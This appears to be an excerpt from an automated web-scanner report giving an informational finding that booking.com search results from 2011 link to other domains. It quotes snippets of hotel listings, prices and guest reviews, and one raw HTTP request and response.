<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/310/3102983.jpg" alt="" class="jq_tooltippex" title="<img src='http://r.bstatic.com/images/hotel/max300/310/3102983.jpg' /><br /><strong>Flatotel, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 773.50" /> Double US$ 773.50

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 1079.50" /> Group US$ 1079.50


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The room was perfect for us.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Omar, Toronto, Canada&nbsp;<img src='http://r.bstatic.com/static/img/flags/16/ca.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/flatotel-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/387/3871612.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/387/3871612.jpg' /><br /><strong>Trump International New York, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_triple_mini.gif" alt="Triple US$ 1790" /> Triple US$ 1790

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 1990" /> Group US$ 1990


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Good attentivness by the staff and the great location

The bedrooms are very luxurious&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Gary, bushey heath, United Kingdom&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/gb.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/trump-international-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/296/2968916.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/296/2968916.jpg' /><br /><strong>Jumeirah Essex House, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 888" /> Double US$ 888


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The location of this hotel can&#39;t be beat in NYC. Situated on Central Park South it is within walking distance of many must see sights, including Columbus Square, Times Square, Rockefeller Plaza/NBC 30 Rock,...&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Alessa, Pacifica, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/j-e-house-new-york-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/230/2307521.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/230/2307521.jpg' /><br /><strong>Holiday Inn Manhattan Sixth Avenue, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 798" /> Double US$ 798

<span class="separator">
...[SNIP]...
</span>


<img src="http://q.bstatic.com/static/img/room_triple_mini.gif" alt="Triple US$ 838" /> Triple US$ 838


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The staff was friendly and efficient. The location was excellent.

&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Henry, Tel Aviv, Israel&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/il.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/manhattan-sixth-avenue.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/385/3857354.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/385/3857354.jpg' /><br /><strong>Hilton New York, New York</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://s.bstatic.com/static/img/room_single_mini.gif" alt="Single US$ 758" /> Single US$ 758

<span class="separator">
...[SNIP]...
</span>


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 818" /> Double US$ 818

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 918" /> Group US$ 918


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Besides the high quality service we received we really enjoyed having a full American breakfast each morning to start our day.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Teresa, Kihei, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/hilton-new-york.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/259/2594396.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/259/2594396.jpg' /><br /><strong>Planet Hollywood Towers, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 1038" /> Double US$ 1038

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 1488" /> Group US$ 1488


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Easy access to the strip and shopping, right in the centre of Las Vegas.
Loved the grand canyon helicopter tour, worth every penny.

&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Gina, North Chailey, United Kingdom&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/gb.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/ph-towers.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/324/3247493.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/324/3247493.jpg' /><br /><strong>The Cosmopolitan of Las Vegas, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 725" /> Double US$ 725


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The room was amazing. Very stylish and sexy. A great place to recover from a Vegas hang over.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Meredith, Austin, TX, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/the-cosmopolitan-of-las-vegas.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/222/2222526.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/222/2222526.jpg' /><br /><strong>Hard Rock Hotel and Casino, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 748" /> Double US$ 748


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;i loved the staff and how they made my stay very enjoyable. from the front desk to the bartenders even busers. this was my first time visitn vegas and the hard rock and casino was the best choice for my stay.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Asia, newington, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/hard-rock-and-casino.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/214/2140804.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/214/2140804.jpg' /><br /><strong>Desert Club Resort, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 258" /> Group US$ 258


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;I think the best part of our stay was the staff, they were all very helpful and happy to please. Staff like this make any stay enjoyable.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Geraldine, Cairnlea, Australia&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/au.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/s-b-r-las-vegas-nevada.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/145/1458076.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/145/1458076.jpg' /><br /><strong>The Venetian Resort-Hotel-Casino, Las Vegas</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 658" /> Double US$ 658


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;everything. design, swimming polls are breathtaking, shopping areas are beautiful. suite was also amazing. i was so sad when i had to leave i decided i had to return soon. also saw other hotels in vegas but definitely will stay always at the venetian.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Claudia, birmingham, United Kingdom&nbsp;<img src='http://q.bstatic.com/static/img/flags/16/gb.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/the-venetian-resort-casino.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<!-- end usersOnPage.inc -->


<img align="left" src="http://q.bstatic.com/static/img/popular_small.gif" alt="" />&nbsp;


There are 14 people looking at this hotel.
</span>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/507/5074544.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/507/5074544.jpg' /><br /><strong>The Regency Inn San Francisco, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 438" /> Double US$ 438


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The Hotel was very nice, not the most luxurious I&amp;#39;ve stayed in but it was very clean and the staff were exceptionally helpful. There is a laundromat around the corner and it&amp;#39;s reaonably priced if you wish to use it.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Morgan, Northop, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/san-francisco-587-eddy-street.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://s.bstatic.com/images/hotel/square40/851/851307.jpg" alt="" class="jq_tooltippex" title="<img src='http://r.bstatic.com/images/hotel/max300/851/851307.jpg' /><br /><strong>Civic Center Motor Inn, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 398" /> Double US$ 398

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 458" /> Group US$ 458


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Cheap, good rooms with connected balconies so you can meet fellow travellers. Good location. No complaints.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Andrew, Calgary, Canada&nbsp;<img src='http://r.bstatic.com/static/img/flags/16/ca.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/best-western-civic-center-motor-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/530/5303765.jpg" alt="" class="jq_tooltippex" title="<img src='http://r.bstatic.com/images/hotel/max300/530/5303765.jpg' /><br /><strong>America&#39;s Best Inn - Fisherman&#39;s Wharf, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 488" /> Double US$ 488


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Staff was amazing, hotel is reasonably clean.
The location is great - the bus stop is 1 min away - going in every direction you might need.
Free parking for our car.
Free internet.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Leona, Ottawa, Canada&nbsp;<img src='http://r.bstatic.com/static/img/flags/16/ca.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/america-s-best-inn-fisherman-s-wharf.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://r.bstatic.com/images/hotel/square40/283/2838303.jpg" alt="" class="jq_tooltippex" title="<img src='http://q.bstatic.com/images/hotel/max300/283/2838303.jpg' /><br /><strong>Travelodge Golden Gate, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 318" /> Double US$ 318


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;Close to bus stop which got me to Golden Gate Park fairly easily.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Lauren, santa monica, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/travelodge-golden-gate.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<td class="c1thumb">


<img width="40" height="40" src="http://q.bstatic.com/images/hotel/square40/162/1621334.jpg" alt="" class="jq_tooltippex" title="<img src='http://s.bstatic.com/images/hotel/max300/162/1621334.jpg' /><br /><strong>Inn on Broadway, San Francisco</strong>" />

</td>
...[SNIP]...
<span class="cheapest">


<img src="http://q.bstatic.com/static/img/room_double_mini.gif" alt="Double US$ 698" /> Double US$ 698

<span class="separator">
...[SNIP]...
</span>


<img src="http://s.bstatic.com/static/img/room_group_mini.gif" alt="Group US$ 778" /> Group US$ 778


</span>
...[SNIP]...
</em>


&nbsp;<img style="cursor: help" rel="300" class="jq_tooltip use_sprites icon_minibubble" src="http://s.bstatic.com/static/img/transparent.png" alt="" title="&ldquo;The location was great! Lots of places to eat and see in walking distance. Awesome coffee shop(Notes from the Underground) and mini mart right down the road. A beautiful old church right out our window and a large community deck off the second floor to enjoy a nice evening on.&bdquo;<br /><br/><img align='left' src=http://r.bstatic.com/static/img/miniperson.gif alt='' />&nbsp;<em style='font-size: 94%'>Janel, Beaverton, U.S.A.&nbsp;<img src='http://s.bstatic.com/static/img/flags/16/us.png' alt='' /></em>" />


</span>
...[SNIP]...
<a href="/hotel/us/broadway-manor-inn.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<!-- scripts_global.inc -->


<script type="text/javascript" src="http://s.bstatic.com/static/js/jquery-1.4.4.min.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/error_catcher.1191.js"></script>


<script type="text/javascript" src="http://q.bstatic.com/static/js/main.1191.js"></script>
...[SNIP]...
19.183. http://www.booking.com/searchresults.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.booking.com
Path:   /searchresults.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /searchresults.html?aid=335591&city=20061717&do_availability_check=1&checkin_monthday=04&checkin_year_month=2011-10&checkout_monthday=07&checkout_year_month=2011-10&label=ufi-P20061717&utm_source=igougo&utm_medium=SPPC&utm_campaign=us&utm_term=ufi-P20061717 HTTP/1.1
Host: www.booking.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/rf?lob=HOTEL&advertiserName=booking&grp=15730&placeholderUrl=http%3A%2F%2Fwww.travelocity.com%2Fvstrack%3FWA1%3D03020%26WA3%3D742%26WA5%3DDRFContinue%26WA6%3Dair%26dst%3Durl_placeholder&url=http%3A%2F%2Fwww.booking.com%2Fsearchresults.html%3Faid%3D335591%26city%3DP20061717%26do_availability_check%3D1%26checkin_monthday%3D%24%7BdepartureDate%3Ad%3A%22dd%22%7D%26checkin_year_month%3D%24%7BdepartureDate%3Ad%3A%22yyyy-mm%22%7D%26checkout_monthday%3D%24%7BreturnDate%3Ad%3A%22dd%22%7D%26checkout_year_month%3D%24%7BreturnDate%3Ad%3A%22yyyy-mm%22%7D%26label%3Dufi-P20061717%26utm_source%3Digougo%26utm_medium%3DSPPC%26utm_campaign%3Dus%26utm_term%3Dufi-P20061717&pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&sid=bfa7dd53-c988-458c-86df-52443affccb8&uid=20d9c1fc-61a4-45f0-9524-380e68994c01&widget=H_PopUnder&pti=default&src=none&ppi=4a15630f-e16d-42c4-95d2-0852b73fdd75&ctx=92aa9504-b6eb-4091-8b93-6582f63d9555&ccn=1&cgn=144&pos=6&aii=ba439bff-beb7-42f1-8f31-89d40d85f167&%24cc=US&%24rc=US&%24adults=1&%24destination=Boston%2C%20MA%20Massachusetts&%24glsId=440663&%24city=Boston&%24countryn=United%20States&%24countryc=US&%24staten=Massachusetts&%24statec=MA&%24lob=HOTEL&%24rooms=1&%24context=92aa9504-b6eb-4091-8b93-6582f63d9555&%24widget=H_PopUnder&%24l=9&%24departureDate=2011-10-04&%24returnDate=2011-10-07&%24aucnt=0&%24pid=c3919e40-e5b8-49f8-b876-4fed1f31968f&%24sid=bfa7dd53-c988-458c-86df-52443affccb8&adunit=d5332d31-d5c8-59f8-c876-4fee1f31712a&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:10:08 GMT
Server: Apache
Set-Cookie: bkng=10UmFuZG9tSVYkc2RlIyh9YXwiHh2%2F7WNDUvX0uhP7z%2Fu1ZYaz9gNQxd55IafrcqsKewAgZpMaj5fZabk6MFuDRuvq58o6S2dFSXEquO8K6cAWdvyRuc9JcewxnlHHL8GOYIx9VvQ59CrwhdaIdStBZrU5q4Ul2guClyvts5IXkU8Ih0ABSFc1yfREbdE8%2B7ma2cdK4o8HDAbGpXup2Rud%2FuWVZbsTNKpP8CfTOZ7OhNndhDIMCH%2FJpeMJWPbLEdaMaSYZn4vDHoQNmtnBn6b8J%2Fb6augQoxf00frRkHVbY68KfYJ505LitOqZ3oZ7z%2FwWy8DZZ0x0aep1Yc6ZO1bfNGToKbQA4b3%2BxXEdyray%2BAxRgnHfTdirXBHrIiwYmgWtjP419X8wonEpceXpCxBzAgvZowpzjITfR8pibhKJiXP8ZIktgM27Ko%2FN0FeapHlFd7qCXe40H6spMYjXkuJghhqyYrHCfhKoxOnIURuiKYju5FyTsAf%2FcGCZQJq5Jz5ROykvLbFlG3FMtN8ezy525Y0V8ACsXyGSJX%2BtAj8qMHr8NQ18df5HpjNT18Hj%2BR%2Bh58NwJwwGSDZjCpXVyLIq62qeabC1McUJgXncEdtL96x7CT%2FvNpdhLhQs7YiMdGaBLTHQTiwULvwyjL3vRFAAGqf8FaoHB%2B87GGYPg8Zzjv%2FAPfoqMyv0OJ%2Bvo1UWD4XBr1wWtIBwidOwITrWQUTf6BVJbKeYZmUvJzYcSSdA3UcFUpr9u1XIBJZ%2F0I4DksHfQhFfmwQ00nikj%2FywtBV%2F84%2BElq4XUsM8Gh%2FcAK5W8NIqtn5QRqry6pE1NgaNCX68XLgU6zltzmw4cLFtMMbOsIx7ofy9ssO6wOlJNxZdhfbLc4O7Zj%2BMWlGTqVrC42NkTgj4512OLZ%2Fc6I67UMvxh3Qie%2FlodheV5sPFXIR5FRrKWi4wsUs48W8gfOBJvpOolIwpdDJdTSxjSuRPL01EuNp7z3Dzy3wlaJZQbE6JrU8PlbJc7tBTRWHZ4mRSdH%2FtGgL9yyifCtziMdOGXNw6kftdRVdI%2FGDbzndHQiN35W7VHyoeMFRi%2Bd0F1FkpavfYxfQdNoqwcdwsAEmwMjyALxN7GqyN1qmLPU4%2BEEBPt5ms%2F7RsoZErADPkOg986sTx5Aq%2B86Q6HID1BJLr7mUjVwW%2FTOkTW4s5494hGd%2FgPB5yo0b0OuCALpHxQxAubkIgrz6yNEReexNwFQBY6hvQFMAFVvhYSMd%2FLdChQJHNAANkDJjdsfannaTHlca6HDzStDUKlpg5Rxu4hGW%2F39QUq9dNAvdq6dQirX43mfviJRlxEdXAXSib9a34ZWTPn%2Bq%2F; path=/; domain=.booking.com; expires=Fri, 20-Dec-2019 00:10:09 GMT; HTTPOnly
X-Recruiting: Like HTTP headers? Come write ours: booking.com/jobs
Vary: Accept-Encoding
Cache-Control: private
Content-Length: 388853
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<!-- start: law_lang_country
...[SNIP]...
<link rel="canonical" href="http://www.booking.com/searchresults.en.html?city=20061717;utm_campaign=us;utm_medium=SPPC;utm_source=igougo;utm_term=ufi-P20061717" />


<link rel="shortcut icon" href="http://s.bstatic.com/static/img/favicon.ico" />
<link rel="apple-touch-icon" href="http://s.bstatic.com/static/img/apple-touch-icon.png" />
<link rel="help" href="/general.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;tmpl=docs/faqmain" />

<link rel="search" type="application/opensearchdescription+xml" href="http://q.bstatic.com/static/opensearch/en-us.xml" title="Booking.com online hotel reservations" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/main.1191.css" />


<link rel="stylesheet" type="text/css" href="http://q.bstatic.com/static/css/popups.1191.css" media="screen" />


<link rel="stylesheet" type="text/css" href="http://r.bstatic.com/static/css/searchresults.1191.css" media="screen" />


<style type="text/css">
...[SNIP]...
<a href="http://www.booking.com/index.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101" title="Booking.com" style="text-decoration: none;">


<img id="globe" src="http://s.bstatic.com/static/img/experiments/logo-full.png" width="116" height="119" alt="Book your hotel in Boston U.S.A." />


<img id="logo_nobg" src="http://s.bstatic.com/static/img/b25logo/woordmerk.png" width="222" height="25" alt="Booking.com online hotel reservations" />


<img id="tagline" src="http://r.bstatic.com/static/img/b25logo/tagline_us.png" width="186" height="15" alt="a priceline company" />


</a>
...[SNIP]...
</select>

<img id="radiusImg" alt="" class="help jq_tooltip use_sprites icon_info" src="http://s.bstatic.com/static/img/transparent.png" width="14" height="14" rel="200" title="You can select a distance to search for hotels in the nearby area" />

</h4>
...[SNIP]...
<div id="homein" >

<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkin_year_month" rel="checkin_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
<div id="homeout">
<img src="http://s.bstatic.com/static/img/transparent.png" class="placeholder" alt="" />
<h3 class="firsth3">
...[SNIP]...
<a class="calendar inlineJsRequired calendarLink" href="#checkout_year_month" rel="checkout_year_month"><img align="absbottom" src="http://s.bstatic.com/static/img/transparent.png" width="21" height="18" alt="calendar" title="Open calendar and pick a date" class="icon_calendar use_sprites" /></a>
...[SNIP]...
gt;" href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1">


<img class="sr_dynamic_sprite_img" src="http://q.bstatic.com/sprite88/0/1691256/1916558/3104632/1176290/1364622/577726/2733212/1314320/2896144/1116149/4803980/3558887/4972964/1359167/3026843/614006/4941453/4165001/1671019/2293180.jpg" alt="Copley Square Hotel" style="top: 0;" />

</a>
...[SNIP]...
<a href="/hotel/us/copley-square.en-us.html?aid=335591;label=ufi-P20061717;sid=9fcdaabed9e2bb46b60772539b0ca101;checkin=2011-10-04;checkout=2011-10-07;srfid=d7dea8120903ba76c86df3f7d5812996X1"><img class="use_sprites icon_plus" src="http://s.bstatic.com/static/img/transparent.png" alt="" /></a>
...[SNIP]...
<div>
